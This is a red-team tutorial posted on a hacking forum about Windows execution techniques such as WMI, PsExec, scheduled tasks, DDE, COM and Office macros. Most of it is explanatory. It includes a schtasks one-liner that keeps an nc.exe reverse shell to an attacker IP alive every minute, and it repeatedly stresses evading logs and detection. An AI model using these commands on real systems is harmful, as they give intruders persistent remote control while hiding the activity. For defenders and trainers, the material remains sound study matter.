HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Pentest Red Team Techniques - Execution

dEEpEst

dEEpEst

☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Mar 29, 2018
Messages
13,861
Solutions
4
Reputation
27
Reaction score
45,546
Points
1,813
Credits
55,350
‎7 Years of Service‎
 
56%

Red Team Techniques​

Execution​

The adversary is trying to run malicious code.

Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.

Most of these techniques do not require a Tool but just access and Native Tools from the Windows Machine itself one of the reasons we want to use Execution on Windows-Signed Binaries is to mainly avoid detection or:

Code: 
Avoid creating new processes/network connections
Avoid creating anomalous parent/child relationships
Avoid creating/modifying files/registry entries
Avoid creating memory anomalies
Avoid leaving evidence in log files
 

Windows Management Instrumentation​

Adversaries may abuse Windows Management Instrumentation (WMI) to achieve code execution. WMI is a Windows Administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.

An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.

Very awesome things we can do with wmic(Command-Line), in a local and/or remote manner.

Let's enumerate locally we can grab valued info such as Name, Manufacturer, Model, Domain and a Description

image

Environment

image

Users, Groups

image

Missing patches:

image

Execution of an XSL File

image

Execution, we can create a process and execute code

image

Wmic is proxy aware so it can also call xsl file from remote host that can contain our payloads. This is a great method to avoid logs as it is very uncommon to be used and OPSEC safe for environments.
 

User Execution​

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.

While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.
 

Malicious File​

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl.

Adversaries may employ various forms of Masquerading on the file to increase the likelihood that a user will open it.

While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

There are so many files available for gaining Execution on our target machine and creating payloads for them is just not possible to follow one methods since there are plethora of ways to create these and using different languages, but here I recommend a GitHub page with some POC of these famous extensions and are harmless as they only pop calc.exe

This link is hidden for visitors. Please Log in or register now.
 

Malicious Link​

An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Link. Clocking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution. Links may also lead users to download files that require execution via Malicious File.

I will not demonstrate this one as we already have an idea of what is going on by checking Initial Access in the Spearphishing Section.
 

Service Execution​

Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services. The service control manager is accessible to users via GUI components as well as system utilities as sc.exe and Net.

PsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.

Adversaries may leverage these mechanisms to execute malicious content. This can be done either executing a new or modified service. This technique is the execution used in conjunction with Windows Service during service persistence or privilege escalation.

Example:

An example as mentioned previously is we can use PsExec. Psexec drops a binary into the $ADMIN SMB Share and uses service.exe to execute that binary and gain execution

But to run PsExec first we need to meet certain requirements such as:

1. Server Message Block (SMB) must be available and reachable. i.e. not blocked by firewall.

2. "File and Print Sharing" must be enabled.

3. "Simple File Sharing" must be disabled.

4. Admin$ share must be available and accessible. (Admin$ share is a hidden SMB share that maps to the Windows directory, and is intended for software deployments. The creds supplied to PSEXEC must be able to access the Admin$ share.)

An example of PsExec running for the first time by using the "-accepteula" parameter that creates a Registry Key so be careful when leaving tracks. Also this will elevate our permissions to SYSTEM.

image
 

Scheduled Tasks/Job​

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified data and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments).

Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).
 

Shared Modules​

Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess, Loadlibrary, etc. of the Win32 API.

The module loader can load DLLs:


  • Via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;

  • Via Export forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);

  • Via an NTFS junction or symlink program.exe.lcaol with the fully-qualified or relative pathname of a directory containing DLLs specified in the IMPORT directory or forwarded EXPORTS;

  • Via <file name=filename.extension" loadfrom="fully-qualified or relative pathname"> in an embedded or external application manifest". The file name refers to an entry in the IMPORT directory or forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.
 

Scheduled Task​

Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on.Scheduling a task on a remote system typically required being a member of the Administrators group on the remote system.

An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct a remote Execution as part of Lateral movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.

Let's create a task that keep a reverse shell alive every minute.

Code: 
schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads/nc.exe 192.168.56.103 1337 -e cmd.exe'

image

As we can see here creating a task can be done with a simple syntax and I demonstrated with nc.exe binary which takes also arguments!, all that was needed is to be inside the double-quotes ("") and it will take arguments with spaces.These tasks can also be created remotely. All that is needed is the user to be an administrator or have proper permissions on the Remote machine.

In the schtasks help menu we see the arguments needed after /create to create a task on a remote server. We can supply the username and password on the arguments to authenticate and create the task.

It would look something like this.

Code: 
schtasks /create /s "PC-NAME" /tn "My App" /tr "PATH" /sc minute /mo 1 /u Domain\User /p password
[If password is not supplied it will prompt asking for one]

image
 

At (Windows)​

Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.

An adversary may use at.exe in Windows environments to execute programs at system startup or on scheduled basis for persistence. At can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).

Note: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks.

Sample:

image
 

Native API​

Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes. This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.

Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These framework typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.

Adversaries may abuse these native API functions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.

In the following example will utilize the CreateProcess API which the documentation specifies that this API: Creates a new process and its primary thread. The new process runs in the security context of the calling process.

Code: 
#include <iostream>
#include <Windows.h>

int main()
{

/*
 BOOL CreateProcessW(
  [in, optional]      LPCWSTR               lpApplicationName,
  [in, out, optional] LPWSTR                lpCommandLine,
  [in, optional]      LPSECURITY_ATTRIBUTES lpProcessAttributes,
  [in, optional]      LPSECURITY_ATTRIBUTES lpThreadAttributes,
  [in]                BOOL                  bInheritHandles,
  [in]                DWORD                 dwCreationFlags,
  [in, optional]      LPVOID                lpEnvironment,
  [in, optional]      LPCWSTR               lpCurrentDirectory,
  [in]                LPSTARTUPINFOW        lpStartupInfo,
  [out]               LPPROCESS_INFORMATION lpProcessInformation
);
*/

    STARTUPINFO si{ sizeof(si) };
    PROCESS_INFORMATION pi;

    wchar_t cmd[] = L"notepad.exe";
    BOOL ok = CreateProcessW(NULL,cmd, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
}
 

Inter-Process Communication​

Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPS is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern.

Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows Dynamic Data Exchange or Component Object Model. Higher level execution medium, such as those of Command and Scripting Interpreters, may also leverage underlying IPC mechanisms.
 

Dynamic Data Exchange​

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Objecting Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry Keys.

Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via Phishing campaigns or hosted Web content avoiding the use of Visual Basic for Applications (VBA) macros. DDE could be leveraged by adversary operating on compromised machine who does not have access to a Command and Scripting Interpreter

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of string, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Example:

In the following example will setup a simple DDE command that will use PowerShell to execute a Nishang Reverse Shell that will connect back to my attacker machine.

As of 2017 some products don't support DDE no more, but Excel and Outlook do still by default

I will open a new excel spreadsheet and type the syntax into the formula box on the A1 cell

image

On the formula field we will write the following syntax. If you receive a formula error it will usually highlight where the error is located.

Command

With this we save and re-open the File, we will have a server running and a listener on our attacking machine to receive the connection back to us.

image

Once the user opens the file an Update button and a Security Warning will be shown on the upper section of the spreadsheet

image

Once the update is accepted a second prompt will be shown for trusting the external resource.

image

Click Yes and we see our code ran successfully and we receive a connection back to our machine

image

Demo:

image
 

Component Object Model​

Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).

Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and Visual Basic. Specific COM objects also exist to directly perform functions beyond code execution, such as creating a Scheduled Task/Job, file less download/execution, and other adversary behaviors related to privilege escalation and persistence.

Blog:

This link is hidden for visitors. Please Log in or register now.


This link is hidden for visitors. Please Log in or register now.


*Some small edits need to be applied as a IP address is always given for Lateral Movement but by removing this we can execute locally

Examples:

First we start by searching some COM Objects available and that can allows us to Execute code on the local machine. PowerShell is a great way to enumerate some COM objects and find one that has a proper method to execute code.

image

So with some proper enumeration and some testing we can actually execute find by finding a proper COM Object that contains a method that will allows us to execute code.

Now in this example we will use an already known COM Object ShellWindows and using it ShellExecute Method

Let us instantiate the object by using the CLSID we can use the Type.GetTypeFromCLSID paired with the Activator.CreateInstance mathod you will need the CLSID of the object to do this correctly

image

Now we can execute and invoke any methods we want but we want to achieve actual interaction with the host so from here we access the WindowsShell.Item method.

image

When going through all the methods and doing the proper research a method that stood out was "Document.Application.ShellExecute"

image

Demo:

image
 

Exploitation for Client Execution​

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to applications they commonly used to do work , so they are a useful target for exploit research and development because of their high utility.

Several types exist:

Browser-based Exploitation

Web browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing mails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through Phishing. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
 

Office Applications​

Office Applications

Macros in this example I will show the simple use of Macros to Execute a Shell in this technique it will work as a downloader to call our payload and then Execute, while it cleans up on its own leaving no files on the System

Example:

image

image

image

Shell:

image

Please Ignore my multiple tries
 

Command and Scripting Interpreter​

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are common features across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.

There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript/Jscript and Visual Basic.

Adversaries may abuse these technologies in various ways as means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.
 

Network Device CLI​

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.

Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or secure shell (SSH).

Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.

No Examples the need of a Network Device with Command-Line like Cisco Routers is enough to know
 

JavaScript/JScript​

Adversaries may abuse JavaScript and/or JScript for execution. JavaScript (JS) is a platform-agnostic scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.

Jscript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the Component Object Model and Internet Explorer HTML Application (HTA) pages.

Adversaries may abuse JavaScript / Jscript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a Drive-by Compromise or downloading and executing these script files as secondary payloads. Since the payloads are text-based, it is also very common for adversaries to obfuscate their content as part of Obfuscated Files or Information.

Example:

image
 

Python​

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

Python a Programming/Scripting Language common in the infosec community some great and powerful tools have been published using the language (Impacket, cough* cough*). Currently in its version 3 it is great for infosec this can also execute on Windows meeting certain requirements of course having Python being installed, and Linux the majority of the distributions come with it as a Default.

Examples (Unix):

image

This is also a great offensive tool some sites (pentestmonkey) contain some great examples of 1liner shells to execute with certain languages an Python is no exception as it has an option as well.
 
You must log in or register to reply here.
Back
Top